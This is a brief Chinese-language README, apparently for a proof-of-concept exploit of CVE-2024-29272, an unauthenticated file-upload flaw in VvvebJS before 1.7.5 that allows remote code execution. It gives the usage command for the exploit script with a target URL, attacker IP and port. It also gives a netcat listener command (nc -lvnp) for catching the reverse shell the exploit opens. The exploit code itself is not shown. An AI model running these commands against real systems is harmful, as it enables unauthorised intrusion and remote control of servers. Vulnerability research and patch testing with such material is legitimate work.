
针对CVE-2024-29272的概念验证漏洞利用,这是VvvebJS < 1.7.5中的未认证任意文件上传漏洞,可实现远程代码执行。
这是CVE-2024-29272的概念验证(PoC),该漏洞存在于VvvebJS < 1.7.5版本中,是一个未经验证的任意文件上传漏洞,可导致远程代码执行。
使用方法:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
在另一个终端中:
nc -lvnp <ATTACKER PORT>